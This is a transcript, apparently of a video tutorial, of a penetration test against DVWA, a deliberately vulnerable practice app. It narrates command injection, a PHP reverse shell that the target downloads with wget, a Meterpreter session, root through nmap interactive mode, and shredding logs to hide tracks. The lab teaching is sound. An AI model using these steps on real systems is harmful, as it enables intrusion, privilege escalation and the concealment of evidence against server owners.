In this video, we're going to use Metasploit to attack this web application. We're going to test the security of this web application to gain access to the server. And successfully, we have gained access to the server. I'm not using nmap. Now, if I type in who am I, I'm root now, because it's given me that permission. All right, guys, let's get started. So this is a vulnerable web application that you can actually go ahead and set up by yourself. If you want me to do a video on it, just comment DVWA and I'll set up this and I'll do a tutorial on how to set this up. But this is basically a web application or a website that purposely has vulnerabilities on it. So it just allows you to practice your website pen testing skills to obviously develop the interest and skill in web application security. So without further ado, today we're going to be looking at this command execution or command injection vulnerability on a website. So we can see here, if we enter something on this input field, something will happen. So for example, if we type in 192.168.1.1, which is actually my router address, IP address, and this will go ahead and to basically do a ping scan. If you don't know what ping is basically, it sends a request to the router and it sends it back to ensure that this device on our network is connected and there is connectivity. So that's kind of what ping does. Now, if you ever see an input field that requires you to input something in the input field, it could potentially be vulnerable to command injection vulnerability if you type in certain stuff within the input field, which we'll get into. The reason why there may be input fields like this, it could be on a, let's say like a website that allows you to search for books or something, and it has an input field, or maybe it says enter something below. Let's say that there was a website that allowed you to search for books, and to see if the book is available, you go to the input field to search up the book name to see if it has availability. What that does is it sends a request to the server to ensure that if there is available books in this section, it will display it on the web page. You can try and input malicious commands to see if it does react. This video is for educational purposes. What I would like to do is to see if this vulnerable web application obviously does that. So we entered our IP address and it went ahead behind the scenes to perform that scan. So if it's using a utility tool like ping, what else can it use is what I'm saying. So for example, if we do something like, so if we open up our own terminal and we obviously type in ping and then we type in a address here, like 192.168, whatever, default network. We can see the requests are getting sent to make sure that the packets are being received, allowing us to understand that there is network connectivity. So let's say that we also did something like this. We kind of did a pipe command and then we typed in ls. What did I just do there? So let me go back. What did I just do here? So I performed the ping scan, right? But then I say, okay, maybe no, or ls to list the files on my directory, the current directory I'm in. So wait, can I do that here as well? So if I do this, can I do that, ls? Look at what just happened. This is vulnerable to command injection. We injected another command to do something, like ls. Wow, what else can we do? Okay, so the fact that we identified this, it sent a request to the server to perform the ls and bring back the result. So that means, right, this is what I want you to do. Open up your terminal and start Metasploit. So the Metasploit framework just opened. We've identified that if we type in 192.168, I want you to look at this very closely. Look at this. So on this website, we can type in 192.168, which it can be anything. It can literally be anything. But if we type in ls here, we can see we can receive a command. So the fact that it's executed and it retrieved this result from the server, what other commands can we run? So if we type in wget-h, can it run this utility tool? It looks like it can. Look at that. What did you see here? It literally ran this tool. So if wget is available, what does that tell you? So wget is a tool on Linux which you can run to basically download files off the internet, basically. So what if I set up a web server with a malicious file that actually allows me to gain access to the server in the back end? You don't believe that's possible? Check this out. So we're going to use multi-handler here to handle a payload. Now, I'll explain what this is. Let me just cut the video and explain this. When it comes to the Metasploit framework, the Metasploit framework has a thing called modules. Now, these modules is like every different set of pre-packaged code, which allows an attacker to utilize a thing called a payload against a target server, or a vulnerability which they find on the server. And essentially in the video, you'll see me upload the payload, the package which has the payload, also known as the exploit, which delivers the payload. So we use an exploit module to deliver that package in the directory and then run it from the server. It allows the attacker to gain access to the server, allowing them to send back commands and execute their own commands to get more information about it. Okay, so that's what that is. So now let's go back to it. So we're going to use the handler here. Let me just close this. So what I want to do is I want you to go to var www.html. So this is where our web server is. What I want you to do is I want you to clear all of this stuff here. This is where the web server is. Okay, so there's nothing in here. Let's run msf venom, which is going to allow us to create this malicious file. Payload php interpreter reverse TCP. We could do that. And then we can also do our host is equal to our address. This is your IP address, your machine that will connect with the other machine so that you can send commands back and forth. So this is my machine, which I believe is 141. If you don't know what it is, open up a new terminal, type in ifconfig grep inet. So this is just going to specifically filter out what your address is. If I could copy that, mine is 141. I got that there. Our port, local port. I'm just going to do 4444. It doesn't matter what you do. You can do 222, 333. It's just the port number. Okay, so now once we've done that, the output of, or the type of file is going to be a raw PHP file. And we're going to call it, let's say, shell.php, because it's going to allow us to gain access to it. So this is going to go ahead and actually generate the shell. It's going to combine this PHP generated code for us into a file called shell.php. Now, watch this. If I type in mousepad and I actually open this up, okay, there's nothing in here for some reason. Maybe, oh, okay, so it says permission denied. So let's do that with root instead, so sudo, so that we have kind of authoritative permission to generate this payload. Okay, so now it has done that. So what I want to do now is type in mousepad shell php. Now you can see here, what even is that? It looks like a bunch of mess. So let me just go through the code real quick so that you can understand what's going on. So basically we've got the PHP code here. We've declared our IP address as the variable and the port that it will connect to. We are using the default socket client library, which is basically a code. So when we use sockets on a network, it's basically the connection on the network that connects to another device. So it's a socket that connects to a existing connection. So a client and a server, or a client and a client, can connect to each other. Think of it like Discord. When you join a Discord call, it creates a socket connection for you to talk. You basically connect to two hosts. So basically that's kind of what a socket is. It's basically sharing that communication. And we are doing this over TCP. So now we can basically send commands back and forth. It actually says here, if there is no socket, then don't declare a socket connection. So if it doesn't connect, the socket just turns off. And if there is a connection, that means we can actually inject malicious commands on it. So that's basically what this PHP code does. Malicious commands, as in we can control it. So if we go back here, we can use a tool like wget, but we actually need to set up a web server. So let's do that. So on your terminal, I want you to do, because the file is here, let's type in python 3-m. We're going to use this module, http.server, which is basically a Python library which allows us to run a web server off our device. So now look, if we go to our address, our IP address, and we go to port 8080, go to port 8080, we can see here that it's basically getting a request, right? But you see the secure connection failed, right? Because obviously it's HTTPS. So if we go to here, you can see that's our file. So if we do /shell.php, don't press enter because it's actually going to download the file. I want you to go back and I want you to do this. So go back to the Metasploit framework. We're going to set the payload to PHP interpreter reverse TCP like that. We're going to set the L host to our host. And by the way, it doesn't have to be capital. Set L port to 3333. And then we're going to go ahead and run this. And essentially what's going to happen, it's going to set up a listener. A listener is basically something which listens for the connection. It's basically listening to see if the connection is going to happen. So it says started reverse TCP handler. Now it's going to wait. So it's just the connection waiting. So once it connects, then we can control it. So now watch this. So now if we come back here, let's refresh the page here. Let's refresh the page. Let's not send anything. Let's go back to normal here with the ls thing. So if we do that, sends a request, brings back the result like that. That's on the server. So now if we type in this, and we type in wget and then our malicious file and click submit, what do you think is going to happen? It's going to go ahead and download that file onto the server. So you can see here, nothing retrieved back. But now if I go back and type in ls again, what's going to happen? Our file is on the server. Now the question is, do we have PHP on the server? We obviously do, because this web application, if you don't know what this web application is using, you can actually use a quick banner grabber tool called whatweb, which is basically going to go into the developer console here. Check this out. So when you go into the developer console, you can actually check to see what the web application is written in. So if I go to network and I refresh, you can see the connection happen, but you can also see the results. So all this information here in the response headers, you can see what the web application is using. So if I come down here, and there should be some, yeah, so powered by PHP. But this information looks a little bit messy. We don't want to always go into inspect element and go to the network tab to see what it's in. So basically what this tool does, it just receives information about it onto the terminal. So you can see here, this is in a lot readable manner. And if you wanted to make it a little bit cleaner, you could do this -v. So it kind of dumps it in a much more neat information here. So you can see HTTP server, Ubuntu Linux, see, it's using PHP. So PHP is installed on the server. That's why the web application, the website is running. So you can see here, this was the request that happened. So that is the target machine. It did a GET request and it downloaded the file. Now, if we go to here and we need to type in that thing again so that we actually select that the other command is going to run first. So if we do PHP and then the file name, you can see here it will run. And successfully, we have gained access to the server. How do I know? Look, it says Meterpreter shell. What does that mean? It means once the socket connection connected, now we can send commands back and forth. So remember, Metasploit is a C2 framework, which means it's a command and control framework that we can use to send back commands. Now, if I type in system info, we can see we are access to the machine. So if I type in help, these are the commands which we can run on the server. We have gained access to the server. That's pretty cool, right? We can run file system commands. We come up here, we can do other commands like background. We can run the current background. We can even run post-exploitation modules to see if there's any other vulnerabilities on the system. Now, if we do something like shell, and I type in ls, you can see here, I'm on the server. If I go back, you can see here, I can see the other files on the server. Pretty cool, right? Now I can keep going back, and I can keep going back, and now I'm literally on the server. So let me fix this bit here. So export your terminal so that you can type in clear. And also, one thing that I would like to do is, let's type in Python version here. Okay, so we are using Python 2. Okay, so what I'm going to do is exit. And then what I'm going to do is, okay, so it's a bit stuck here. So we need to go back into the shell. Run Python C like that. Import pty, pty.spawn. And this is going to spawn a shell, a much more readable shell here compared to the one we are currently using. So now you can see here, it's a lot more readable. And now if I type in ls, you can see here, I'm going to go back and you can see I'm on the machine. I'm on the Linux server that we can browse around and take a look at our log files. And you can see who am I, because I'm not actually root. I'm just the default user, but we can browse around to see more information about what's on the system or even find other vulnerabilities. So pretty cool, right? So you can do a lot of things. You can go back like that. What else can we do here? There's a lot of stuff which we can do because we have gained access to the system. We have actually gained access to the machine, but let's run in the background. So if we type in sessions here, we can see that we can come back to the session later. But I want to see if I can, so let's just kill that session, session 1, sessions. So we've closed that session, so we can go back to normal here. Here, let's do cat etc password. I can also do that on the shell as well. If I come down here, you can see all this information about the system and other services that's running on the system as well. It seems like there's also a Tomcat, which we can also check out and gain access to and do some other crazy stuff, right? But you can also see here if there's any other users. Users has default bash shell. You can see which services use what. You can see this user use bash. But Declan, how do we gain root? Well, that's a good question. there's a lot of things that we can do to figure out what else is on the system that we can gain root about. So if we go back and we do that again, let's run our malicious payload and let's run it and let's gain access to the server again to see what else we can do. So if I run this command here, find perms type dev null. So essentially what this is going to do is if I run that, it's going to see which available tools or anything that's in the binary that I can use to kind of leverage off gaining privilege escalation. Hopefully that kind of made sense. So if I come up here, if I browse around here, you can see bin, all these permissions are by default that I can use to possibly gain root. So you can see here, look, we've even got mmap, we've got these tools here. We can do ping-v to identify, okay, maybe ping version maybe. Oh, okay, how do we identify okay, no. So what I want to do is not ping, I want to do nmap. So we can see here, nmap is actually installed on the system, but why? Because what I want to see is if I do nmap-v, we've got nmap-f, so we've got nmap version 4, but today we don't have nmap version 4. See, what I want to show you is if I go to nmap, take a look at this, nmap-v. We've got nmap 7. nmap 4 is very outdated. So what does that mean? It means, well, if that's the case, nmap-h, what can we do here? So this is on the system. This is not on ours. This is on this Linux server. So what I want to see is what is outdated here that we could take advantage of. So nmap 4, we've got scan techniques. Everything's the same. Everything looks the same at least. But how can we run this tool to gain root? That means if I go ahead and let's run nmap interactive mode. Okay, we are interactive mode, right? Let's type in help. So what does that mean? If we type in who am I? Okay, sorry, we are in the tool. So, okay, this is what I wanted to see here. This exclamation mark, it says run shell given command in the foreground. So this allows us to kind of exit, right? But let's do something like exit sh. So we are using this tool to exit our current version of the shell to gain root. So now I've just done that. So I'm not using nmap. Now if I type in who am I, I'm root now because it's given me that permission. So with this outdated version of nmap, we are root on the server. So you can see how outdated versions of software or tools or utility tools can kind of give you a leverage to gaining higher user privileges on the system. That's very fascinating and that's awesome. Educational purposes only. Anyways, so now if we type in what we did last time, so Python C, import pty like a boss, import pty.spawn. Let's spawn this shell here. Look at that, we are root right now. What does that mean? We are literally root. We are root of the system. We can change files, we can manipulate files, we can go to the log directory. Let's go to the log directory real quick. Let's go to the logs. Let's shred the logs so we hide our tracks, of course. Let's do that. Boom, gone, cat. Now there's nothing here. Look at that, we are hidden. We hide and we hide. And user log, let's check user log. Let's do cat, boom. Okay, there's nothing in here. What about? Okay, you get the point, right? So let's take a step back, Declan. That was quite a lot. So what did we just do there? So the first thing we identified was a web application vulnerability. We first identified that there was a flaw on a website. So when we send a request, when we search for something, we can actually inject commands into the input field, which will allow us to interfere with the backend, interfere with the server, and use tools in the backend like wget to download a malicious file from our server to gain access to their server. With that in mind, there was also outdated versions of other software and tools on that system that we could leverage and use to gain root, gain higher privileges on the system, on the server, for us to obviously gain higher privileges, and we basically have control over everything. It's like running administrator on Windows, right? So pretty interesting. That was fascinating. Anyways, I hope you learned something here. This video is for educational purposes. I wanted to show you a perspective on how black hat hackers can definitely do this to your server or your website or whatever you're developing or whatever you're making in the background. Just be aware to use the latest and updated software or tools. Make sure you don't use anything that is outdated because hackers can use this to potentially ruin your business or even ruin your app, your website, whatever the case is. So make sure that everything's up to date. And if you want to learn more about this, go to dexsecurityacademy.com. I have everything there to do with cybersecurity topics, one-on-one training, penetration testing. Feel free to book a call and talk with me about what you want to do, what you want to learn, etc. And I can guide you to some resources. Join my free Discord community. I would love to see you in my community thriving and learning about cybersecurity and protecting businesses and protecting people's lives. I want to make sure that everything is up to date with your tools and software, and you learn how to protect yourself and protect other people around you from these types of attacks. So just be aware of that. And also, I do have courses that you can check out. I have a Metasploit course coming up that you can also check out, which will provide you a lot of in-depth information on how to use the Metasploit framework in more of an advanced manner. So if you want to learn more about that, go to dexsecurityacademy.com and I'll see you there. Thank you for watching this video. I really appreciate it. Please like and subscribe, and I'll see you in the next.